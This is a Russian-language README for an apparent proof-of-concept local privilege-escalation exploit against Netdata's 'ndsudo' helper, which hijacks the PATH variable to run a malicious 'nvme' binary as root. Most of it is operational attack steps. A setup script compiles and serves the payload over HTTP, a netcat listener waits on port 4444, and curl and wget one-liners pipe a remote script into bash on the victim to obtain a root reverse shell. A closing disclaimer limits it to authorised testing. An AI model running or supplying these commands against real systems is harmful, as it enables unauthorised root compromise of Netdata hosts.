
Bash-скрипт для повышения привилегий через "ndsudo" (Netdata Local Exploit)
Bash-скрипт для повышения привилегий через «ndsudo» (локальный эксплойт Netdata)
>= v1.45.0, < v1.45.3
>= v1.44.0-60, < v1.45.0-169
Инструмент «ndsudo» запускает ограниченный набор внешних команд, но пути поиска задаются переменными окружения «PATH».
Изменив переменную окружения «PATH» на путь, к которому у нас есть доступ, мы можем контролировать, где ndsudo ищет команды, и создать команду, содержащую вредоносный код.
Этот эксплойт основан на предположении, что целевая машина и машина атакующего находятся в одной сети.
Мы можем автоматически сгенерировать и развернуть файл, необходимый для атаки, запустив «setup_exploit_server.sh»
$ ./setup_exploit_server.sh YOUR_IP
--------- Exploit Infrastructure Setup by Ottanta ---------
[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444
Press Enter to stop the web server and clean up...
Этот скрипт создаст все файлы, необходимые для атаки, настроенные с вашим IP-адресом.
После развертывания нашего веб-сервера мы запускаем прослушиватель в другой оболочке:
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...
В зависимости от нашего HTTP-клиента мы можем загрузить и выполнить наш эксплойт.
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP
Если всё сделано правильно, теперь у нас должна быть корневая оболочка.

Это доказательство концепции предназначено только для образовательных и авторизованных целей тестирования.
Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, является незаконным.
Авторы не несут ответственности за любое неправомерное использование этой информации.